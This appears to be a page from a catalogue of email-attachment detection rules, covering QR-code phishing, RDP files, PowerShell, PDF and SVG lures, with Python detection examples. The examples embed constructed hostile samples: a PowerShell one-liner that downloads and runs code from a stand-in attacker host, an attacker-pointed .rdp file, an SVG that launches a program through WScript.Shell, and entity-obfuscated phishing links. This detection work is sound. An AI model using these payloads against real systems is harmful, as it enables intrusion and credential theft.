EXPLORE DETECTIONS

1,048 detections found

Attachment: PowerPoint with suspicious hyperlink

Attached PowerPoint contains a suspicious hyperlink that can execute arbitrary code.

ATT&CK: T1566.001, T1204.002, T1486, T1036, T1027 (+1 more)
Author: Sublime | Severity: high

Attachment: PowerShell content

Recursively scans files and archives to detect PowerShell content. While scripts are often blocked by mail filtering, alternative file formats and archived content may be employed to bypass such controls.

ATT&CK: T1566.001, T1204.002, T1486, T1059
Author: Sublime | Severity: high

Attachment: Python generated PDF with link

The PDF attachment was created with a Python-based script and contains one or more links. These techniques were used by PikaBot, among others.

ATT&CK: T1036, T1027
Author: Sublime | Severity: medium

Attachment: QR code link with base64-encoded recipient address

Detects when an image or macro attachment contains QR codes that, when scanned, lead to URLs containing the recipient's email address. This tactic is used to uniquely track or target specific recipients and serve tailored credential phishing pages.

ATT&CK: T1566, T1566.001, T1566.002, T1598, T1036 (+3 more)
Author: Sublime | Severity: high

Attachment: QR code with credential phishing indicators

Detects messages with one to three attachments containing a QR code with credential-theft indicators, such as: a LinkAnalysis credential-phishing conclusion, a decoded QR code URL that traverses suspicious infrastructure, a final destination listed in URLhaus, a decoded URL that downloads a ZIP or executable, use of URL shorteners, open redirects known to be abused in QR code campaigns, and more.

ATT&CK: T1566, T1566.001, T1566.002, T1598
Author: Sublime | Severity: medium

Attachment: QR code with encoded recipient targeting and redirect indicators

Detects QR codes in attachments that contain the recipient's email address (either plaintext or base64 encoded) and redirect through suspicious URI structures commonly associated with Kratos/SneakyLog redirection services.

ATT&CK: T1566, T1566.001, T1566.002, T1598, T1036 (+1 more)
Author: Sublime | Severity: high

Attachment: QR code with recipient targeting and special characters

Detects messages whose attachments contain a QR code whose URL includes the recipient's email address (plaintext or base64-encoded) in the URL path or fragment, together with special characters in the path. The URLs have a simple path structure and may end with suspicious patterns.

ATT&CK: T1566, T1566.001, T1566.002, T1598, T1036 (+1 more)
Author: Sublime | Severity: high

Attachment: QR code with suspicious URL patterns in EML file

Detects EML attachments containing QR codes that link to URLs with suspicious patterns, including specific alphanumeric combinations in subdomains and paths, or special characters followed by encoded terminators. These patterns are commonly used to evade detection in credential theft attacks.

ATT&CK: T1566, T1566.001, T1566.002, T1598, T1036 (+1 more)
Author: Sublime | Severity: high

Attachment: QR code with userinfo portion

Detects inbound messages that contain image or document attachments with QR codes containing embedded usernames, passwords, or excessively padded URLs. This technique is used to bypass traditional text-based detection methods.

ATT&CK: T1566, T1566.001, T1566.002, T1598, T1204.002 (+3 more)
Author: Sublime | Severity: high
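The QR code rules above (recipient address in plaintext or base64, userinfo portion, padded URLs) all reduce to checks on the URL decoded from the QR image. The following Python is an added illustration of those checks and is not Sublime's rule logic or MQL; the QR decoding step itself is assumed to have already happened, the 16-character base64 run length and the 20-character padding threshold are assumptions, and the URLs and the recipient address alice@example.com are constructed samples.

```python
from __future__ import annotations

import base64
import re
from urllib.parse import unquote, urlsplit

# Runs of base64 / base64url characters long enough to hold an e-mail address (assumed threshold).
B64_RUN = re.compile(r"[A-Za-z0-9+/_-]{16,}={0,2}")
# Assumption: a run of 20+ identical characters is treated as excessive padding.
PADDING_RUN = re.compile(r"(.)\1{19,}")


def decode_base64_runs(text: str) -> list[str]:
    """Decode every base64-looking run in text at all four character alignments.

    Trying each alignment means a recipient address embedded inside a longer encoded
    string (for example base64("id=alice@example.com")) is still recovered, and
    base64url or unpadded input is tolerated.
    """
    decoded = []
    for match in B64_RUN.finditer(text):
        token = match.group(0).replace("-", "+").replace("_", "/")
        for offset in range(4):
            chunk = token[offset:].rstrip("=")
            if len(chunk) % 4 == 1:  # a single trailing sextet can never be valid
                chunk = chunk[:-1]
            chunk += "=" * (-len(chunk) % 4)
            try:
                decoded.append(base64.b64decode(chunk, validate=True).decode("utf-8", "ignore"))
            except ValueError:  # binascii.Error is a ValueError
                continue
    return decoded


def analyze_qr_url(url: str, recipient: str) -> dict:
    """Apply the targeting, userinfo and padding checks to one decoded QR code URL."""
    parts = urlsplit(url)
    # The path, query and fragment are where per-recipient tokens get planted.
    tail = unquote(parts.path) + "?" + unquote(parts.query) + "#" + unquote(parts.fragment)
    recipient_lc = recipient.lower()
    findings = {
        "host": parts.hostname,
        "recipient_plaintext": recipient_lc in tail.lower(),
        "recipient_base64": any(recipient_lc in d.lower() for d in decode_base64_runs(tail)),
        # user:pass@host puts a trusted-looking name in front of the real host.
        "userinfo": parts.username is not None or parts.password is not None,
        "excessive_padding": PADDING_RUN.search(tail) is not None,
    }
    findings["suspicious"] = any(
        findings[k] for k in ("recipient_plaintext", "recipient_base64", "userinfo", "excessive_padding")
    )
    return findings


if __name__ == "__main__":
    # Constructed samples; alice@example.com is the message recipient.
    for sample in (
        "https://cdn.example.net/v/YWxpY2VAZXhhbXBsZS5jb20",  # base64(alice@example.com) in path
        "https://login.example.net/#alice@example.com",        # plaintext recipient in fragment
        "https://microsoft.com:login@evil.example.net/path",   # userinfo portion
        "https://x.example.net/" + "A" * 40 + "/go",           # padded path
        "https://benign.example.net/docs/report.pdf",
    ):
        print(sample, analyze_qr_url(sample, "alice@example.com"))
```

Decoding at all four alignments matters because the address is rarely the whole encoded string: it is usually wrapped in a tracking parameter before being encoded, so a straight comparison against base64(recipient) misses it.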

Attachment: RDP connection file

Recursively scans files and archives to detect RDP connection files. Coercing a target user into connecting to an attacker-owned RDP server can expose elements of their host and potentially lead to compromise.

ATT&CK: T1566.001, T1204.002, T1486, T1566, T1566.002 (+1 more)
Author: Sublime | Severity: medium
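Both the PowerShell content rule and the RDP connection file rule above depend on recursively opening archives and classifying what is inside by name and by content. The Python below is an added example of that scan, not Sublime's implementation: it handles only zip (other archive formats need additional libraries), the content signatures, depth limit and member size cap are assumptions, and the nested archive, the .rdp file and the PowerShell one-liner it scans are constructed samples.

```python
from __future__ import annotations

import io
import re
import zipfile

MAX_DEPTH = 5                        # nested-archive limit (assumed)
MAX_MEMBER_BYTES = 50 * 1024 * 1024  # skip members larger than this instead of inflating them (assumed)

# Content signatures are assumptions for this example, not Sublime's rule logic.
RDP_SIGNATURE = re.compile(rb"^(?:alternate )?full address:s:", re.MULTILINE | re.IGNORECASE)
POWERSHELL_SIGNATURE = re.compile(
    rb"\b(?:Invoke-Expression|IEX|Invoke-WebRequest|Start-Process)\b"
    rb"|New-Object\s+(?:System\.)?Net\.WebClient"
    rb"|-EncodedCommand\b|-enc\b|powershell(?:\.exe)?\s+-",
    re.IGNORECASE,
)


def classify(name: str, data: bytes) -> list[str]:
    """Name- and content-based checks for a single, non-archive file."""
    hits, lower = [], name.lower()
    if lower.endswith(".rdp") or RDP_SIGNATURE.search(data):
        hits.append("rdp_connection_file")
    if lower.endswith((".ps1", ".psm1", ".psd1")) or POWERSHELL_SIGNATURE.search(data):
        hits.append("powershell_content")
    return hits


def rdp_target(data: bytes) -> str | None:
    """Return the server an .rdp file would connect to (its 'full address' setting)."""
    match = re.search(rb"^full address:s:(.+?)\s*$", data, re.MULTILINE | re.IGNORECASE)
    return match.group(1).decode("latin-1") if match else None


def scan(name: str, data: bytes, depth: int = 0) -> list[tuple[str, str]]:
    """Return (path, finding) pairs for a file, descending into zip archives."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return [(name, hit) for hit in classify(name, data)]
    if depth >= MAX_DEPTH:
        return [(name, "max_depth_exceeded")]
    results = []
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            path = f"{name}/{info.filename}"
            if info.file_size > MAX_MEMBER_BYTES:
                results.append((path, "oversized_member"))
                continue
            try:
                member = archive.read(info)
            except RuntimeError:  # password-protected member, a common filter-evasion step
                results.append((path, "encrypted_member"))
                continue
            results.extend(scan(path, member, depth + 1))
    return results


# Constructed sample .rdp file pointing at an attacker-controlled host with drive redirection on.
SAMPLE_RDP = (
    b"screen mode id:i:2\r\n"
    b"full address:s:attacker.example.net:3389\r\n"
    b"redirectdrives:i:1\r\n"
    b"redirectclipboard:i:1\r\n"
)
# Constructed PowerShell one-liner hidden in a .txt file.
SAMPLE_PS_TXT = b"$c = New-Object Net.WebClient; IEX $c.DownloadString('http://attacker.example.net/a')"


def build_sample() -> bytes:
    """Constructed attachment: outer zip -> inner zip -> .rdp, plus a .txt carrying PowerShell."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("invoice/connect.rdp", SAMPLE_RDP)
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("docs.zip", inner.getvalue())
        z.writestr("readme.txt", SAMPLE_PS_TXT)
        z.writestr("photo.jpg", b"\xff\xd8\xff\xe0 not really a jpeg")
    return outer.getvalue()


if __name__ == "__main__":
    for path, finding in scan("attachment.zip", build_sample()):
        print(f"{finding:22} {path}")
    print("rdp target:", rdp_target(SAMPLE_RDP))
```

The encrypted-member and oversized-member branches are the parts worth keeping in a real scanner: password-protected archives are exactly how script content gets past mail filtering, so they deserve a finding of their own rather than a silent skip, and the size cap keeps a nested archive from being inflated into memory.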

Attachment: RFC822 containing suspicious file sharing language with links from untrusted sender

This rule identifies messages with an RFC822 attachment that contains language indicative of suspicious file-sharing activity. It checks both the original sender and the nested sender against highly trusted domains. The original message is unsolicited and has not previously been flagged as a false positive.

ATT&CK: T1566, T1566.001, T1566.002, T1598, T1036 (+1 more)
Author: Sublime | Severity: medium

Attachment: RFP/RFQ impersonating government entities

Attached RFP/RFQ impersonates a U.S. government department or entity to commit fraudulent transactions.

ATT&CK: T1566.002, T1534, T1656, T1598.003, T1566 (+1 more)
Author: Sublime | Severity: high

Attachment: RTF file with suspicious link

This rule detects RTF attachments, directly attached or within an archive, that contain an external link to a suspicious low-reputation domain.

ATT&CK: T1566, T1566.001, T1566.002, T1598, T1036 (+1 more)
Author: Sublime | Severity: medium

Attachment: RTF with embedded content

RTF files can contain embedded content, similar to OLE files (Microsoft Office documents).

ATT&CK: T1566.001, T1204.002, T1486, T1036, T1027
Author: Sublime | Severity: medium

Attachment: Self-sender PDF with minimal content and view prompt

Detects messages where the sender and recipient are the same address with a PDF attachment containing only 'VIEW PDF' text and a standardized body message requesting to view the attachment.

ATT&CK: T1566, T1566.001, T1566.002, T1598, T1204.002 (+3 more)
Author: Sublime | Severity: high

Attachment: SFX archive containing commands

Attachment is an SFX archive containing commands that execute when it is opened. This can be used to run malicious commands and has been observed in the wild.

ATT&CK: T1566.001, T1204.002, T1486, T1036, T1027 (+1 more)
Author: Sublime | Severity: medium

Attachment: Small text file with link containing recipient email address

The attached text file is smaller than 1000 bytes and contains a recipient's email address. Seen in the wild carrying credential phishing links.

ATT&CK: T1566, T1566.001, T1566.002, T1598, T1036 (+1 more)
Author: Sublime | Severity: medium

Attachment: Soda PDF producer with encryption themes

Detects an observed TTP of using Soda PDF (which offers a free trial) to produce PDFs whose OCR output references encryption and mentions a PDF. The PDF contains a single link, which has been observed pointing to a credential phishing page.

ATT&CK: T1566, T1566.001, T1566.002, T1598
Author: Sublime | Severity: high

Attachment: Suspicious employee policy update document lure

Inbound message with a subject line and attachments related to handbook, compensation, or policy updates. Attachments are limited to Microsoft Word documents matching similar update-related terminology. This pattern has been observed delivering credential phishing via QR codes.

ATT&CK: T1566, T1566.001, T1566.002, T1598, T1036 (+1 more)
Author: Sublime | Severity: medium

Attachment: Suspicious PDF created with headless browser

Detects PDF documents containing a table of contents that were generated using HeadlessChrome, Chromium with Skia/PDF, or QT, with empty metadata fields: common characteristics of automated malicious document creation.

ATT&CK: T1566, T1566.001, T1566.002, T1598, T1036 (+1 more)
Author: Sublime | Severity: high
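The Python-generated PDF, Soda PDF and headless-browser rules above all key on the Producer and Creator strings in the PDF's Info dictionary, combined with the link count and whether metadata such as Title and Author is empty. The Python below is an added illustration of extracting and classifying those fields and is not Sublime's implementation: the marker strings (ReportLab, FPDF, pypdf, Skia/PDF, HeadlessChrome, Chromium, Qt, Soda PDF) are assumptions to be checked against PDFs you have observed, and the PDF skeletons it analyzes are constructed samples that carry an Info dictionary and link annotations but are not renderable documents.

```python
from __future__ import annotations

import re

INFO_KEYS = ("Producer", "Creator", "Title", "Author")
# A PDF string is either a literal (...) with backslash escapes or a hex string <...>.
PDF_STRING = rb"(\((?:\\.|[^\\)])*\)|<[0-9A-Fa-f\s]*>)"
KEY_RE = {key: re.compile(rb"/" + key.encode() + rb"\s*" + PDF_STRING) for key in INFO_KEYS}
URI_RE = re.compile(rb"/URI\s*" + PDF_STRING)

# Marker strings are assumptions for this example; verify them against PDFs you have observed.
HEADLESS_MARKERS = ("headlesschrome", "skia/pdf", "chromium", "qt ")
PYTHON_MARKERS = ("reportlab", "fpdf", "pypdf")
SODA_MARKERS = ("soda pdf",)


def pdf_string(token: bytes) -> str:
    """Decode one PDF string token, including UTF-16BE text with a byte-order mark."""
    if token.startswith(b"<"):
        digits = re.sub(rb"\s", b"", token[1:-1])
        raw = bytes.fromhex((digits + b"0" * (len(digits) % 2)).decode("ascii"))
    else:
        raw = re.sub(rb"\\([()\\])", rb"\1", token[1:-1])  # unescape \( \) \\
    if raw.startswith(b"\xfe\xff"):
        return raw[2:].decode("utf-16-be", "replace")
    return raw.decode("latin-1")


def pdf_info(data: bytes) -> dict[str, str]:
    """Pull Producer/Creator/Title/Author out of the raw bytes. The last occurrence wins,
    because incremental updates append a newer Info dictionary at the end of the file."""
    info = {}
    for key, pattern in KEY_RE.items():
        matches = pattern.findall(data)
        info[key] = pdf_string(matches[-1]).strip() if matches else ""
    return info


def classify_pdf(data: bytes) -> dict:
    """Producer/creator-based classification plus link count and metadata emptiness."""
    info = pdf_info(data)
    tool = (info["Producer"] + " " + info["Creator"]).lower()
    empty_metadata = not info["Title"] and not info["Author"]
    has_outlines = b"/Outlines" in data  # a table of contents is stored as an outline tree
    return {
        "info": info,
        "links": len(URI_RE.findall(data)),  # URI actions on link annotations
        "headless_browser": any(m in tool for m in HEADLESS_MARKERS) and empty_metadata and has_outlines,
        "python_generated": any(m in tool for m in PYTHON_MARKERS),
        "soda_pdf": any(m in tool for m in SODA_MARKERS),
    }


def build_sample_pdf(producer: bytes, creator: bytes, title: bytes, uris: list[bytes], outlines: bool) -> bytes:
    """Constructed PDF skeleton with an Info dictionary and link annotations (not renderable)."""
    catalog = b"/Type /Catalog /Pages 2 0 R" + (b" /Outlines 4 0 R" if outlines else b"")
    annots = b"".join(
        b"<< /Type /Annot /Subtype /Link /A << /S /URI /URI (" + u + b") >> >>\n" for u in uris
    )
    return (
        b"%PDF-1.4\n1 0 obj << " + catalog + b" >> endobj\n" + annots
        + b"3 0 obj << /Producer (" + producer + b") /Creator (" + creator + b")"
        + b" /Title (" + title + b") /Author () >> endobj\ntrailer << /Info 3 0 R >>\n%%EOF\n"
    )


if __name__ == "__main__":
    chrome = build_sample_pdf(b"Skia/PDF m120", b"HeadlessChrome/120.0.0.0", b"",
                              [b"https://login.example.net/"], outlines=True)
    report = build_sample_pdf(b"ReportLab PDF Library - www.reportlab.com", b"unspecified", b"Invoice",
                              [b"https://a.example.net/", b"https://b.example.net/"], outlines=False)
    for sample in (chrome, report):
        print(classify_pdf(sample))
```

Two caveats for real files: from PDF 1.5 the Info dictionary can live inside a compressed object stream, and modern producers also write XMP metadata, so a raw-bytes scan like this should be backed by a proper parser; and a literal string may legally contain balanced unescaped parentheses, which the simple regex above does not handle.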

Attachment: Suspicious VBA macro

Detects any VBA macro attachment that scores above a low confidence threshold in the Sublime Macro Classifier.

Author: Sublime

Attachment: SVG file execution

Detects file execution attempts in SVG files, where ActiveXObject is used to invoke WScript.Shell and run a program.

ATT&CK: T1566.001, T1204.002, T1486, T1059
Author: Sublime | Severity: high

Attachment: SVG file with HTML entity encoded href attributes

Detects SVG file attachments containing href attributes with three or more consecutive HTML numeric entity references, a technique used to obfuscate malicious URLs and evade security scanning.

ATT&CK: T1566.001, T1204.002, T1486, T1566, T1566.002 (+3 more)
Author: Sublime | Severity: medium

Attachment: SVG file with hyperlinks and cursor styling

Detects inbound messages containing SVG attachments that include clickable hyperlink elements and CSS pointer cursor styling, which may be used to deceive recipients into clicking malicious links disguised as legitimate images.

ATT&CK: T1566, T1566.001, T1566.002, T1598, T1036 (+1 more)
Author: Sublime | Severity: medium
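The three SVG rules above (script execution through ActiveXObject and WScript.Shell, href attributes built from runs of numeric entity references, and clickable anchors styled with a pointer cursor) can all be checked on the raw document text. The Python below is an added example of those checks, not Sublime's implementation; it works on raw text rather than a parsed XML tree so that malformed files are still scanned, and the three SVG documents it examines are constructed samples.

```python
import html
import re

# Three or more consecutive numeric character references (decimal or hex).
ENTITY_RUN = re.compile(r"(?:&#(?:[xX][0-9A-Fa-f]+|[0-9]+);){3,}")
HREF_ATTR = re.compile(r"""\b(?:xlink:)?href\s*=\s*(["'])(.*?)\1""", re.S)
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.S | re.I)
ANCHOR_TAG = re.compile(r"<a\b[^>]*>", re.I)
CURSOR_POINTER = re.compile(r"cursor\s*:\s*pointer", re.I)
SHELL_OBJECT = re.compile(r"new\s+ActiveXObject\s*\(\s*[\"']WScript\.Shell[\"']\s*\)", re.I)
SHELL_CALL = re.compile(r"\.(?:Run|Exec)\s*\(", re.I)


def analyze_svg(svg: str) -> dict:
    """Run the three SVG checks over the raw document text."""
    hrefs = [m.group(2) for m in HREF_ATTR.finditer(svg)]
    scripts = SCRIPT_BLOCK.findall(svg)
    return {
        "hrefs_decoded": [html.unescape(h) for h in hrefs],
        # Entity-encoded hrefs are decoded so the real destination can be reputation-checked.
        "entity_encoded_hrefs": [html.unescape(h) for h in hrefs if ENTITY_RUN.search(h)],
        "has_script": bool(scripts),
        # Both the shell object creation and a Run/Exec call must be present.
        "script_execution": any(SHELL_OBJECT.search(s) and SHELL_CALL.search(s) for s in scripts),
        "clickable_with_pointer_cursor": bool(hrefs)
        and ANCHOR_TAG.search(svg) is not None
        and CURSOR_POINTER.search(svg) is not None,
    }


# Constructed samples.
SAMPLE_ENTITY_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
    '<a xlink:href="&#104;&#116;&#116;&#112;&#115;&#58;//evil.example.net/login">'
    '<rect width="400" height="200" style="cursor:pointer" fill="#eee"/>'
    '<text x="20" y="100">Click to view the shared document</text></a></svg>'
)
SAMPLE_SCRIPT_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg"><script type="text/javascript"><![CDATA['
    'var sh = new ActiveXObject("WScript.Shell"); sh.Run("calc.exe");'
    ']]></script></svg>'
)
SAMPLE_BENIGN_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg"><a href="https://www.example.com/">'
    '<text x="10" y="20">Docs</text></a></svg>'
)

if __name__ == "__main__":
    for label, sample in (("entity", SAMPLE_ENTITY_SVG), ("script", SAMPLE_SCRIPT_SVG), ("benign", SAMPLE_BENIGN_SVG)):
        print(label, analyze_svg(sample))
```

Decoding the href with html.unescape is the important step: an XML parser would silently resolve the entity references, so a scanner that only looks at parsed attribute values never sees the obfuscation, while a scanner that only looks at the raw text never sees the destination. Checking both views catches the technique and still yields a URL that can be fed to reputation lookups.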
Page 9 of 44